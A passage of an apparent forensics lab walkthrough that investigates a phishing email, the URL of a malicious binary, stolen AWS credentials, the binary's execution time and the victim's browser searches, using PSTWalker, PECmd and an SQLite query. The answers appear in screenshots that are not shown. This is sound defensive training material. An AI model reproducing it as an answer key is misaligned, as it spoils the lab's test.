href="https://substackcdn.com/image/fetch/$s_!quu5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!quu5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png 424w, https://substackcdn.com/image/fetch/$s_!quu5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png 848w, https://substackcdn.com/image/fetch/$s_!quu5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png 1272w, https://substackcdn.com/image/fetch/$s_!quu5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!quu5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png" width="1456" height="495" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:495,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!quu5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png 424w, https://substackcdn.com/image/fetch/$s_!quu5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png 848w, https://substackcdn.com/image/fetch/$s_!quu5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png 1272w, https://substackcdn.com/image/fetch/$s_!quu5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>2. It appears there&#8217;s a link within the email. Can you provide the complete URL where the malicious binary file was hosted?</strong></p><p><strong>Method:</strong></p><ul><li><p>Inspect the body of the email within PSTWalker to find the complete URL.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7zcS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7zcS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png 424w, https://substackcdn.com/image/fetch/$s_!7zcS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png 848w, https://substackcdn.com/image/fetch/$s_!7zcS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png 1272w, https://substackcdn.com/image/fetch/$s_!7zcS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7zcS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png" width="784" height="296" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d273d923-af39-4f3a-a3af-55f323c92a03_784x296.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:296,&quot;width&quot;:784,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7zcS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png 424w, https://substackcdn.com/image/fetch/$s_!7zcS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png 848w, https://substackcdn.com/image/fetch/$s_!7zcS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png 1272w, https://substackcdn.com/image/fetch/$s_!7zcS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd273d923-af39-4f3a-a3af-55f323c92a03_784x296.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>3. The threat actor managed to identify the victim's AWS credentials. From which file type did the threat actor extract these credentials?</strong></p><p><strong>Method:</strong></p><ul><li><p>Search through the extracted email attachments and associated files.</p></li><li><p>The AWS credentials were identified in an attachment file.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OUik!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OUik!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png 424w, https://substackcdn.com/image/fetch/$s_!OUik!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png 848w, https://substackcdn.com/image/fetch/$s_!OUik!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png 1272w, https://substackcdn.com/image/fetch/$s_!OUik!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OUik!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png" width="1371" height="376" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7a361290-6af5-42aa-a48d-67c404327603_1371x376.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:376,&quot;width&quot;:1371,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OUik!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png 424w, https://substackcdn.com/image/fetch/$s_!OUik!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png 848w, https://substackcdn.com/image/fetch/$s_!OUik!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png 1272w, https://substackcdn.com/image/fetch/$s_!OUik!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a361290-6af5-42aa-a48d-67c404327603_1371x376.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>4. Provide the actual IAM credentials of the victim found within the artifacts.</strong></p><p><strong>Method:</strong></p><ul><li><p>Continue browsing through PSTWalker and identify the specific IAM email.</p></li><li><p>Extract the IAM credentials from the email body.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ee8A!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ee8A!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png 424w, https://substackcdn.com/image/fetch/$s_!ee8A!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png 848w, https://substackcdn.com/image/fetch/$s_!ee8A!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png 1272w, https://substackcdn.com/image/fetch/$s_!ee8A!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ee8A!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png" width="538" height="145" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:145,&quot;width&quot;:538,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ee8A!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png 424w, https://substackcdn.com/image/fetch/$s_!ee8A!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png 848w, https://substackcdn.com/image/fetch/$s_!ee8A!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png 1272w, https://substackcdn.com/image/fetch/$s_!ee8A!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2adc3797-2c44-4f60-b466-2a99acf5302a_538x145.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>5. When (UTC) was the malicious binary activated on the victim&#8217;s workstation?</strong></p><p><strong>Method:</strong></p><ul><li><p>Open the <strong>PECmd Timeline CSV</strong> using <strong>Timeline Explorer</strong>.</p></li><li><p>Filter for: <br>Superstar_MemberCard.tiff.exe</p></li><li><p><strong>Result:</strong> Note the <strong>execution time</strong> of the binary in UTC.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!O7Sd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!O7Sd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png 424w, https://substackcdn.com/image/fetch/$s_!O7Sd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png 848w, https://substackcdn.com/image/fetch/$s_!O7Sd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png 1272w, https://substackcdn.com/image/fetch/$s_!O7Sd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!O7Sd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png" width="1456" height="628" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6c132e41-943c-4042-972f-89132645ba0e_1842x795.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:628,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!O7Sd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png 424w, https://substackcdn.com/image/fetch/$s_!O7Sd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png 848w, https://substackcdn.com/image/fetch/$s_!O7Sd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png 1272w, https://substackcdn.com/image/fetch/$s_!O7Sd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c132e41-943c-4042-972f-89132645ba0e_1842x795.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>6. Following the download and execution of the binary file, the victim attempted to search for specific keywords on the internet. What were those keywords?</strong></p><p><strong>Method:</strong></p><ul><li><p>Open the <strong>browser history database</strong> using <strong>DB Browser for SQLite</strong>.</p></li><li><p>Run the following SQL query: <br>SELECT url, title, datetime(last_visit_time/1000000-11644473600, 'unixepoch') AS visit_time<br>FROM urls<br>WHERE url LIKE '%search%' OR title LIKE '%search%';</p></li><li><p>Check for search-related keywords in the query results.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uAoD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uAoD!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png 424w, https://substackcdn.com/image/fetch/$s_!uAoD!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png 848w, https://substackcdn.com/image/fetch/$s_!uAoD!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png 1272w, https://substackcdn.com/image/fetch/$s_!uAoD!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uAoD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png" width="1082" height="609" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:609,&quot;width&quot;:1082,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uAoD!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png 424w, https://substackcdn.com/image/fetch/$s_!uAoD!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png 848w, https://substackcdn.com/image/fetch/$s_!uAoD!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png 1272w, https://substackcdn.com/image/fetch/$s_!uAoD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74039e19-927d-4f7e-8cab-33f8a5b4ee45_1082x609.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 